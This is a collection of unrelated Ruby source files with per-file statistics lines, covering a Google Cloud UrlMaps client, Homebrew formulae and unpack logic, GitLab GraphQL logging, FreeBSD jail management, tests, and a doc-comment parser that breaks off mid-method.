# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload update(project: nil, request_id: nil, url_map: nil, url_map_resource: nil)
# Pass arguments to `update` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param url_map [::String]
# Name of the UrlMap resource to update.
# @param url_map_resource [::Google::Cloud::Compute::V1::UrlMap, ::Hash]
# The body resource for this request
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def update request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::UpdateUrlMapRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.update request, options do |result, response|
yield result, response if block_given?
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Runs static validation for the UrlMap. In particular, the tests of the provided UrlMap will be run. Calling this method does NOT create the UrlMap.
#
# @overload validate(request, options = nil)
# Pass arguments to `validate` via a request object, either of type
# {::Google::Cloud::Compute::V1::ValidateUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::ValidateUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload validate(project: nil, url_map: nil, url_maps_validate_request_resource: nil)
# Pass arguments to `validate` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param url_map [::String]
# Name of the UrlMap resource to be validated as.
# @param url_maps_validate_request_resource [::Google::Cloud::Compute::V1::UrlMapsValidateRequest, ::Hash]
# The body resource for this request
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::UrlMapsValidateResponse]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::UrlMapsValidateResponse]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def validate request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::ValidateUrlMapRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.validate request, options do |result, response|
yield result, response if block_given?
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Configuration class for the UrlMaps REST API.
#
# This class represents the configuration for UrlMaps REST,
# providing control over credentials, timeouts, retry behavior, logging.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# # Examples
#
# To modify the global config, setting the timeout for all calls to 10 seconds:
#
# ::Google::Cloud::Compute::V1::UrlMaps::Client.configure do |config|
# config.timeout = 10.0
# end
#
# To apply the above configuration only to a new client:
#
# client = ::Google::Cloud::Compute::V1::UrlMaps::Client.new do |config|
# config.timeout = 10.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"compute.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "compute.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr :timeout, nil, ::Numeric, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
end
end
end
end
end
end
end
end
| 60.924096 | 477 | 0.582336 |
33c0cb52a8cf001e82c05b75980b9be897119eaa | 139 | <%= boiler_plate %>
card = Balanced::Card.fetch('<%= request['card_href'] %>')
card.debit(
<%= params_to_hash.call(payload).indent(2) %>
)
| 23.166667 | 58 | 0.647482 |
4aaf225f18f17f2b4bf2ad290864b11391eb270a | 1,788 | # frozen_string_literal: true
module UnpackStrategy
class Zip
prepend Module.new {
def extract_to_dir(unpack_dir, basename:, verbose:)
if merge_xattrs && contains_extended_attributes?(path)
# We use ditto directly, because dot_clean has issues if the __MACOSX
# folder has incorrect permissions.
# (Also, Homebrew's ZIP artifact automatically deletes this folder.)
return system_command! "ditto",
args: ["-x", "-k", path, unpack_dir],
verbose: verbose,
print_stderr: false
end
result = begin
super
rescue ErrorDuringExecution => e
raise unless e.stderr.include?("End-of-central-directory signature not found.")
system_command! "ditto",
args: ["-x", "-k", path, unpack_dir],
verbose: verbose
return
end
volumes = result.stderr.chomp
.split("\n")
.map { |l| l[/\A skipping: (.+) volume label\Z/, 1] }
.compact
return if volumes.empty?
Dir.mktmpdir do |tmp_unpack_dir|
tmp_unpack_dir = Pathname(tmp_unpack_dir)
# `ditto` keeps Finder attributes intact and does not skip volume labels
# like `unzip` does, which can prevent disk images from being unzipped.
system_command! "ditto",
args: ["-x", "-k", path, tmp_unpack_dir],
verbose: verbose
volumes.each do |volume|
FileUtils.mv tmp_unpack_dir/volume, unpack_dir/volume, verbose: verbose
end
end
end
}
end
end
| 34.384615 | 89 | 0.534116 |
aca43165d765b133a295ec18c7ed84a083bdb6b7 | 1,553 | module URLUtils
module_function
def append_query_param(url_str, param_key, param_val)
uri = URI(url_str)
args = URI.decode_www_form(uri.query || "") << [param_key, param_val]
uri.query = URI.encode_www_form(args)
uri.to_s
end
def remove_query_param(url_str, param_key)
uri = URI(url_str)
args = URI.decode_www_form(uri.query || "").reject { |(key, _)| param_key == key }
uri.query = args.empty? ? nil : URI.encode_www_form(args)
uri.to_s
end
def prepend_path_component(url_str, component)
uri = URI(url_str)
uri.path = "/#{component}#{uri.path}"
uri.to_s
end
# Takes a base_url with no query parameters but with scheme included
# and a params hash. Returns a full uri str with query
# params. Params with nil values are dropped.
def build_url(base_url, params)
uri = URI(base_url)
uri.query = URI.encode_www_form(HashUtils.compact(params))
uri.to_s
end
# http://www.sharetribe.com/en/people -> en
# http://www.sharetribe.com/en-US/people -> en-US
#
# Returns the first "folder" in path. Does not validate the locale
def extract_locale_from_url(url)
URI(url).path.split('/')[1]
end
# www.sharetribe.com => www.sharetribe.com
# www.sharetribe.com:3000 => www.sharetribe.com
def strip_port_from_host(host)
host.split(":").first
end
# Naive join method, which can be used to normalize multiple slashes
#
# Usage: URLUtils.join("foo", "bar/", "baz") => "foo/bar/baz"
def join(*parts)
File.join(*parts.select(&:present?))
end
end
| 28.759259 | 86 | 0.679974 |
01b55a1667f5da239bf7c709a7e2a5492932ea20 | 1,991 | # frozen_string_literal: true
module Gitlab
module Graphql
module QueryAnalyzers
class LoggerAnalyzer
COMPLEXITY_ANALYZER = GraphQL::Analysis::QueryComplexity.new { |query, complexity_value| complexity_value }
DEPTH_ANALYZER = GraphQL::Analysis::QueryDepth.new { |query, depth_value| depth_value }
def analyze?(query)
Feature.enabled?(:graphql_logging, default_enabled: true)
end
def initial_value(query)
variables = process_variables(query.provided_variables)
default_initial_values(query).merge({
query_string: query.query_string,
variables: variables
})
rescue => e
Gitlab::Sentry.track_exception(e)
default_initial_values(query)
end
def call(memo, visit_type, irep_node)
memo
end
def final_value(memo)
return if memo.nil?
analyzers = [COMPLEXITY_ANALYZER, DEPTH_ANALYZER]
complexity, depth = GraphQL::Analysis.analyze_query(memo[:query], analyzers)
memo[:depth] = depth
memo[:complexity] = complexity
memo[:duration] = duration(memo[:time_started]).round(1)
GraphqlLogger.info(memo.except!(:time_started, :query))
rescue => e
Gitlab::Sentry.track_exception(e)
end
private
def process_variables(variables)
if variables.respond_to?(:to_s)
variables.to_s
else
variables
end
end
def duration(time_started)
nanoseconds = Gitlab::Metrics::System.monotonic_time - time_started
nanoseconds * 1000000
end
def default_initial_values(query)
{
time_started: Gitlab::Metrics::System.monotonic_time,
query_string: nil,
query: query,
variables: nil,
duration: nil
}
end
end
end
end
end
| 27.652778 | 115 | 0.599196 |
33e39261493eee79ff35469802e3f7720c40f663 | 241 | require 'asciidoctor/extensions'
require_relative 'pikchr/extension'
Asciidoctor::Extensions.register do
block Asciidoctor::Diagram::PikchrBlockProcessor, :pikchr
block_macro Asciidoctor::Diagram::PikchrBlockMacroProcessor, :pikchr
end
| 30.125 | 70 | 0.838174 |
084d7bae58b573cd9d99544d3f7632dbd9d39844 | 4,593 | require 'spec_helper'
require 'features/page_objects/notification'
describe 'Bulk update work packages through Rails view', js: true do
let(:dev_role) do
FactoryBot.create :role,
permissions: %i[view_work_packages]
end
let(:mover_role) do
FactoryBot.create :role,
permissions: %i[view_work_packages copy_work_packages move_work_packages manage_subtasks add_work_packages]
end
let(:dev) do
FactoryBot.create :user,
firstname: 'Dev',
lastname: 'Guy',
member_in_project: project,
member_through_role: dev_role
end
let(:mover) do
FactoryBot.create :admin,
firstname: 'Manager',
lastname: 'Guy',
member_in_project: project,
member_through_role: mover_role
end
let(:type) { FactoryBot.create :type, name: 'Bug' }
let!(:project) { FactoryBot.create(:project, name: 'Source', types: [type]) }
let!(:status) { FactoryBot.create :status }
let!(:work_package) do
FactoryBot.create(:work_package,
author: dev,
status: status,
project: project,
type: type)
end
let!(:work_package2) do
FactoryBot.create(:work_package,
author: dev,
status: status,
project: project,
type: type)
end
let!(:status2) { FactoryBot.create :default_status }
let!(:workflow) do
FactoryBot.create :workflow,
type_id: type.id,
old_status: work_package.status,
new_status: status2,
role: mover_role
end
let(:wp_table) { ::Pages::WorkPackagesTable.new(project) }
let(:context_menu) { Components::WorkPackages::ContextMenu.new }
let(:display_representation) { ::Components::WorkPackages::DisplayRepresentation.new }
before do
login_as current_user
wp_table.visit!
expect_angular_frontend_initialized
wp_table.expect_work_package_listed work_package, work_package2
# Select all work packages
find('body').send_keys [:control, 'a']
end
describe 'copying work packages' do
context 'with permission' do
let(:current_user) { mover }
before do
context_menu.open_for work_package
context_menu.choose 'Bulk edit'
# On work packages edit page
expect(page).to have_selector('#work_package_status_id')
select status2.name, from: 'work_package_status_id'
end
it 'sets two statuses' do
click_on 'Submit'
expect_angular_frontend_initialized
wp_table.expect_work_package_count 2
# Should update the status
work_package2.reload
work_package.reload
expect(work_package.status_id).to eq(status2.id)
expect(work_package2.status_id).to eq(status2.id)
end
context 'when making an error in the form' do
it 'does not update the work packages' do
fill_in 'work_package_start_date', with: '123'
click_on 'Submit'
expect(page).to have_selector('.notification-box', text: I18n.t('work_packages.bulk.could_not_be_saved'))
expect(page).to have_selector('.notification-box', text: work_package.id)
expect(page).to have_selector('.notification-box', text: work_package2.id)
# Should not update the status
work_package2.reload
work_package.reload
expect(work_package.status_id).to eq(status.id)
expect(work_package2.status_id).to eq(status.id)
end
end
end
context 'without permission' do
let(:current_user) { dev }
it 'does not allow to copy' do
context_menu.open_for work_package
context_menu.expect_no_options 'Bulk edit'
end
end
end
describe 'accessing the bulk edit from the card view' do
before do
display_representation.switch_to_card_layout
loading_indicator_saveguard
end
context 'with permissions' do
let(:current_user) { mover }
it 'does allow to edit' do
context_menu.open_for work_package
context_menu.expect_options ['Bulk edit']
end
end
context 'without permission' do
let(:current_user) { dev }
it 'does not allow to edit' do
context_menu.open_for work_package
context_menu.expect_no_options ['Bulk edit']
end
end
end
end
| 30.417219 | 129 | 0.620509 |
18c1cc0a8a7203d6be4826960c825a66d1b785c4 | 4,833 | #
# Copyright (c) 2015 Mark Heily <[email protected]>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# Factory class to produce objects that interact with OS-specific
# container functionality.
#
# Examples:
# * FreeBSD jails
# * Linux LXC containers
# * Solaris zones
#
class Launch::Container
def self.new(name, plist)
platform = Gem::Platform.local.os
case platform
when 'linux'
raise 'TODO - LXC containers'
when 'freebsd'
Launch::Container::EzJail.new(name, plist)
when 'null'
Launch::Container::Null.new(name, plist)
else
raise 'unsupported OS: ' + platform
end
end
end
# A common base class for all container types
class Launch::Container::Base
attr_reader :name, :chroot
def initialize(name, plist)
@name = name
@logger = Launch::Log.instance.logger
@plist = plist
end
protected
# Where to send log output from shell commands
def shell_logfile
ENV['DEBUG'] ? '' : '>/dev/null 2>&1'
end
end
# A "null container" that executes everything in the host OS
class Launch::Container::Null < Launch::Container::Base
def initialize(name, plist)
super(name, plist)
@chroot = '/'
end
def exists?
true
end
def running?
true
end
def create
self
end
def start
self
end
def stop
self
end
def destroy
nil
end
def spawn(args)
Process.spawn(*args, :close_others => false)
end
def package_manager
Launch::PackageManager.new
end
end
# Use the ezjail-admin tool to manage FreeBSD jails
class Launch::Container::EzJail < Launch::Container::Base
def initialize(name, plist)
super(name, plist)
@chroot = "/usr/jails/#{name}"
@pkgtool = Launch::PackageManager.new(container: @name)
end
def exists?
File.exist? chroot
end
def running?
jails = `jls -N | awk '{ print $1 }'`.split /\n/
jails.include? sanitized_name
end
def create
# XXX-FIXME need to autodetect the next available loopback IP
cmd = "ezjail-admin create #{name} 'lo1|127.0.1.1'"
@logger.debug "creating jail: #{cmd}"
# XXX-FIXME seems to return non-zero if there are warnings
system "#{cmd} #{shell_logfile}" # or raise "command failed: #{cmd}"
raise 'creation failed' unless exists?
Launch::Firewall.new.enable_nat('127.0.1.1') #XXX-FIXME hardcoded
start
system "cp /etc/resolv.conf /usr/jails/#{name}/etc" or raise "cp failed"
# Install required packages
@pkgtool.chroot = chroot
@pkgtool.jail_id = jail_id
@pkgtool.setup
@plist.packages.each do |package|
@pkgtool.install(package) unless @pkgtool.installed?(package)
end
# Run the post-create commands
@plist.post_create_commands.each do |cmd|
cmd.gsub!('$chroot', chroot)
@logger.debug "running post-create command: #{cmd}"
system cmd
# TODO: log and warn on a non-zero exit status
end
end
def start
cmd = "ezjail-admin start #{name} #{shell_logfile}"
@logger.debug "starting jail: #{cmd}"
system cmd
raise 'startup action failed' unless running?
@logger.debug "jail started; jid=#{jail_id}"
end
def stop
cmd = "ezjail-admin stop #{name} #{shell_logfile}"
@logger.debug "stopping jail: #{cmd}"
system cmd
raise 'stop action failed' if running?
end
def destroy
cmd = "ezjail-admin delete -wf #{name} #{shell_logfile}"
system cmd or raise "command failed: #{cmd}"
end
def spawn(args)
@logger.debug "hello"
cmd = ['jexec', jail_id].concat(args)
@logger.debug "spawning: #{cmd.inspect}"
Process.spawn(*cmd, :close_others => false)
end
def package_manager
@pkgtool
end
private
# ezjail sanitizes the name, so we need this name
def sanitized_name
@name.gsub(/\./, '_')
end
# The numeric jail ID of the jail
def jail_id
`jls -n`.split(/\n/).each do |line|
tok = line.split(/ /)
rec = {}
tok.each { |t| key, val = t.split(/=/) ; rec[key] = val }
#@logger.debug rec.inspect
if rec['host.hostname'] == @name
return rec['jid']
end
end
raise "jail not found"
end
end
| 23.925743 | 76 | 0.663149 |
7931ceb3b623a967f00eee20fa691543989b16ff | 46 | class AddStatusToTask < ApplicationRecord
end
| 15.333333 | 41 | 0.869565 |
e9d8a62a1ea80cdaec260720eed075716061ac77 | 1,535 | class SpirvCross < Formula
desc "Performing reflection and disassembling SPIR-V"
homepage "https://github.com/KhronosGroup/SPIRV-Cross"
url "https://github.com/KhronosGroup/SPIRV-Cross/archive/2021-01-15.tar.gz"
version "2021-01-15"
sha256 "d700863b548cbc7f27a678cee305f561669a126eb2cc11d36a7023dfc462b9c4"
license "Apache-2.0"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "80a4ee152f875a3b653457ee40e0a05fa9892cc6203fd3d525e16157e646c3c0"
sha256 cellar: :any_skip_relocation, big_sur: "224f4a1ac8dbc055a8ea1a431a82e275a3de850f805d7aa5388d05696616e403"
sha256 cellar: :any_skip_relocation, catalina: "612183441f7920e7f6a3f4d87181e30ecc071a3d2d20185c8b3d614dc2deb30b"
sha256 cellar: :any_skip_relocation, mojave: "df9e5893b35edc958ae73b9e763ff63e35d5e8438f9e67cc332ec14ce00f6def"
sha256 cellar: :any_skip_relocation, x86_64_linux: "aabda622a0d771c74d290a183ca7bee86642b018204e17a40cc8d21a70e1af64" # linuxbrew-core
end
depends_on "cmake" => :build
depends_on "glm" => :test
depends_on "glslang" => :test
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args
system "make", "install"
end
# required for tests
prefix.install "samples"
(include/"spirv_cross").install Dir["include/spirv_cross/*"]
end
test do
cp_r Dir[prefix/"samples/cpp/*"], testpath
inreplace "Makefile", "-I../../include", "-I#{include}"
inreplace "Makefile", "../../spirv-cross", "spirv-cross"
system "make"
end
end
| 39.358974 | 139 | 0.747883 |
ac9982c00e64ea695c0e74beea5f4cdd043a258e | 904 | # frozen_string_literal: true
# Auto-generated file
# DO NOT EDIT
require 'spec_helper'
RSpec.describe Cryptopay::Rates do
include_context :api
describe '#all' do
it 'returns RatesResult', :aggregate_failures, vcr: 'api/rates/all' do
result = client.rates.all
p result # => <RatesResult data=...>
expect(result).to be_a(Cryptopay::RatesResult)
expect(result).to be_valid
expect(result.invalid_properties).to be_empty
end
end
describe '#retrieve' do
it 'returns RateResult', :aggregate_failures, vcr: 'api/rates/retrieve' do
base_currency = 'BTC'
quote_currency = 'EUR'
result = client.rates.retrieve(base_currency, quote_currency)
p result # => <RateResult data=...>
expect(result).to be_a(Cryptopay::RateResult)
expect(result).to be_valid
expect(result.invalid_properties).to be_empty
end
end
end
| 25.111111 | 78 | 0.686947 |
abff544f2c2d7ee865ca90a9feecc83e5eb51ffe | 47 | module Valkyrie
# Your code goes here...
end
| 11.75 | 26 | 0.702128 |
6165f5b36982e60681d96b53d3a583bf091d11a9 | 5,047 | require 'test_helper'
# ServiceStore.determine_services
#
# Loads service definitions into a Collection object, based on services configuration
# and current ¨aut.service_group param. Tests.
class DetermineServicesTest < ActiveSupport::TestCase
setup :set_custom_service_store
def set_custom_service_store
dummy = {"type" => "DummyService", "priority" => 3}
# This would normally be loaded as YAML, we're going to set it
# directly.
service_declerations = {
"default" => {
"services" => {
"default_a" => dummy.clone,
"default_b" => dummy.clone,
"default_disabled" => dummy.clone.merge("disabled" => true)
}
},
"group1" => {
"services" => {
"group1_a" => dummy.clone,
"group1_b" => dummy.clone,
"group1_disabled" => dummy.clone.merge("disabled" => true)
}
},
"group2" => {
"services" => {
"group2_a" => dummy.clone,
"group2_b" => dummy.clone,
"group2_disabled" => dummy.clone.merge("disabled" => true)
}
}
}
@service_store = ServiceStore.new
@service_store.config = service_declerations
end
def test_basic
service_list = @service_store.determine_services
# default group services
assert service_list.keys.include? "default_a"
assert service_list.keys.include? "default_b"
# but not the disabled one
refute service_list.keys.include? "default_disabled"
# No group1 or group2
assert_nil service_list.keys.find {|key| key.start_with? "group1"}
assert_nil service_list.keys.find {|key| key.start_with? "group2"}
end
def test_add_groups
service_list = @service_store.determine_services %w[group2 group1]
["default_a", "default_b", "group1_a", "group1_b", "group2_a", "group2_b"].each do |service_id|
assert service_list.keys.include? service_id
end
["default_disabled", "group1_disabled", "group2_disabled"].each do |service_id|
refute service_list.keys.include? service_id
end
end
def test_add_group_no_default
service_list = @service_store.determine_services %w{group1 -default}
# does not include default ones
assert_nil service_list.keys.find {|id| id.start_with? "default_"}
# does include group1 ones
assert service_list.keys.include? "group1_a"
assert service_list.keys.include? "group1_b"
end
# Should this raise a clear error instead? For now, we ignore.
def test_missing_service_group_ignored
# Not raise
service_list = @service_store.determine_services %w{non_existing_group}
end
def test_multi_default_groups
store = multi_default_group_store
service_list = store.determine_services
assert service_list.keys.include? "default_a"
assert service_list.keys.include? "other_default_a"
end
def test_multi_default_disable
store = multi_default_group_store
service_list = store.determine_services %w{-other_default}
assert service_list.keys.include? "default_a"
refute service_list.keys.include? "other_default_a"
end
# A terrible way and place to test this, but our legacy code is tricky, currently
# consider this better than nothing. =
#
# the Request.co_params_fingerprint must take account of new "umlaut.service_group", to make sure
# a cached request same but for different umlaut.service_group is NOT re-used
def test_params_fingerprint_includes_service_group
req_string = "/?issn=12345678&"
req = ActionDispatch::TestRequest.new Rack::MockRequest.env_for(req_string)
req_sg1 = ActionDispatch::TestRequest.new Rack::MockRequest.env_for(req_string + "¨aut.service_group[]=group1")
req_sg2 = ActionDispatch::TestRequest.new Rack::MockRequest.env_for(req_string + "¨aut.service_group[]=groupother")
fingerprint = Request.co_params_fingerprint( Request.context_object_params req )
fingerprint_sg1 = Request.co_params_fingerprint( Request.context_object_params req_sg1 )
fingerprint_sg2 = Request.co_params_fingerprint( Request.context_object_params req_sg2 )
assert_not_equal fingerprint, fingerprint_sg1
assert_not_equal fingerprint, fingerprint_sg2
assert_not_equal fingerprint_sg1, fingerprint_sg2
end
def multi_default_group_store
dummy = {"type" => "DummyService", "priority" => 3}
service_declerations = {
"default" => {
"services" => {
"default_a" => dummy.clone,
"default_b" => dummy.clone,
"default_disabled" => dummy.clone.merge("disabled" => true)
}
},
"other_default" => {
"default" => true,
"services" => {
"other_default_a" => dummy.clone
}
},
"extra_group" => {
"services" => {
"extra_group_a" => dummy.clone,
}
}
}
store = ServiceStore.new
store.config = service_declerations
return store
end
end
| 30.77439 | 122 | 0.671884 |
7ae3b7d648e758b67f7eeff10044f90012259cf5 | 1,234 | def floyd(matrix_w)
n = matrix_w.size - 1
matrix_d = []
matrix_w.each { |m| matrix_d << m.clone }
(0..n).each do |k|
(0..n).each do |i|
(0..n).each do |j|
matrix_d[i][j] = [matrix_d[i][j], matrix_d[i][k] + matrix_d[k][j]].min
end
end
end
matrix_d
end
def floyd2(matrix_w)
n = matrix_w.size - 1
matrix_p = Array.new(n + 1) { Array.new(n + 1) { 0 } }
matrix_d = []
matrix_w.each { |m| matrix_d << m.clone }
(0..n).each do |k|
(0..n).each do |i|
(0..n).each do |j|
if matrix_d[i][k] + matrix_d[k][j] < matrix_d[i][j]
matrix_p[i][j] = k + 1
matrix_d[i][j] = matrix_d[i][k] + matrix_d[k][j]
end
end
end
end
matrix_p
end
def path(q, r)
if $P[q - 1][r - 1] != 0
path(q, $P[q - 1][r - 1])
puts "v#{$P[q - 1][r - 1]}"
path($P[q - 1][r - 1], r)
end
end
infinite = Float::INFINITY
adjacency_matrix = [[0, 1, infinite, 1, 5], [9, 0, 3, 2, infinite], [infinite, infinite, 0, 4, infinite], [infinite, infinite, 2, 0, 3], [3, infinite, infinite, infinite, 0]]
p floyd(adjacency_matrix)
p floyd2(adjacency_matrix)
$P = [[0, 0, 4, 0, 4], [5, 0, 0, 0, 4], [5, 5, 0, 0, 4], [5, 5, 0, 0, 0], [0, 1, 4, 1, 0]]
path(5, 3)
| 23.730769 | 174 | 0.515397 |
bb79f419fef51ee2ec6408aae5c97e0c45d6cbc6 | 10,152 |
require 'parse/doccomment_parser'
class CommentData
def initialize
@blocks = []
end
def add_block(block)
@blocks << block
end
def each_block
@blocks.each do |block|
yield block
end
end
def [](i)
@blocks[i]
end
def each_block_of_type(type)
each_block do |block|
yield block if block.is_a?(type)
end
end
def has_blocktype?(type)
each_block_of_type(type) do |block|
return true
end
return false
end
def has_params?
has_blocktype?(ParamBlockTag)
end
def has_exceptions?
has_blocktype?(ThrowsBlockTag)
end
def has_seealso?
has_blocktype?(SeeBlockTag)
end
def has_return?
has_blocktype?(ReturnBlockTag)
end
# Does the method comment include any info in addition to any basic
# description block?
def has_method_additional_info?
has_params? || has_return? || has_exceptions? || has_seealso?
end
# Does the field comment include any info in addition to any basic description
# block?
def has_field_additional_info?
has_seealso?
end
def each_exception
each_block_of_type(ThrowsBlockTag) {|block| yield block }
end
def each_seealso
each_block_of_type(SeeBlockTag) {|block| yield block }
end
def find_param(param_match)
each_block_of_type(ParamBlockTag) do |block|
return block if param_match === block.param_name
end
return nil
end
def find_return
each_block_of_type(ReturnBlockTag) do |block|
return block
end
return nil
end
end
class OurDocCommentHandler < ActionScript::ParseDoc::DocCommentHandler
def initialize(comment_data, handler_config, type_resolver)
@comment_data = comment_data
@handler_config = handler_config
@type_resolver = type_resolver
end
def comment_start(lineno)
@block_handler = @handler_config.initial_block_handler
@inline_handler = nil
beginning_of_block(lineno)
end
def comment_end
end_of_block
end
def text(text)
if @inline_handler
@inline_handler.text(text)
else
@block_handler.text(text)
end
end
def start_paragraph_tag(tag)
end_of_block
@block_handler = @handler_config.handler_for(tag)
beginning_of_block(tag.lineno)
end
def start_inline_tag(tag)
@inline_handler = @block_handler.handler_for(tag)
@inline_handler.start(@type_resolver, tag.lineno)
end
def end_inline_tag
tag = @inline_handler.end
@block_handler.add_inline(tag) if tag
@inline_handler = nil
end
private
def beginning_of_block(lineno)
@block_handler.begin_block(@type_resolver, lineno)
end
def end_of_block
block = @block_handler.end_block
@comment_data.add_block(block) unless block.nil?
end
end
class DocCommentParserConfig
def initialize
@initial_block_handler = nil
@block_handlers = {}
end
attr_accessor :initial_block_handler
def add_block_parser(name, handler)
@block_handlers[name] = handler
handler.handler = self
end
def handler_for(kind)
handler = @block_handlers[kind.body]
if handler.nil?
parse_error("#{kind.source}:#{kind.lineno}: Unknown block tag @#{kind.body}")
handler = NIL_HANDLER
end
handler
end
private
def parse_error(msg)
$stderr.puts(msg)
end
end
class Tag
def initialize(lineno)
@lineno = lineno
end
attr_accessor :lineno
def ==(o)
lineno == o.lineno
end
end
class LinkTag < Tag
def initialize(lineno, target, member, text)
super(lineno)
@target = target
@member = member
@text = text
end
attr_accessor :target, :member, :text
def ==(o)
super(o) && member==o.member && text==o.text && target==o.target
end
end
class CodeTag < Tag
def initialize(lineno, text)
super(lineno)
@text = text
end
attr_accessor :text
end
class BlockTag
def initialize
@inlines = []
end
def add_inline(inline)
# coalesce multiple consecutive strings,
last_inline = @inlines.last
if inline.is_a?(String) && last_inline.is_a?(String)
last_inline << inline
else
@inlines << inline
end
end
def each_inline
@inlines.each do |inline|
yield inline
end
end
def inlines
@inlines
end
def ==(o)
o.respond_to?(:inlines) && inlines==o.inlines
end
end
class ParamBlockTag < BlockTag
attr_accessor :param_name
def ==(o)
super(o) && param_name==o.param_name
end
end
class ThrowsBlockTag < BlockTag
attr_accessor :exception_type
end
class SeeBlockTag < BlockTag
end
class ReturnBlockTag < BlockTag
end
class InlineParser
def start(type_resolver, lineno)
@type_resolver = type_resolver
@lineno = lineno
@text = ""
end
def text(text)
@text << text.to_s
end
end
# creates a LinkTag inline
def create_link(type_resolver, text, lineno)
if text =~ /^\s*([^\s]+(?:\([^\)]*\))?)\s*/
target = $1
text = $'
# TODO: need a MemberProxy (and maybe Method+Field subclasses) with similar
# role to TypeProxy, to simplify this, and output_doccomment_inlinetag
if target =~ /([^#]*)#(.*)/
type_name = $1
member_name = $2
else
type_name = target
member_name = nil
end
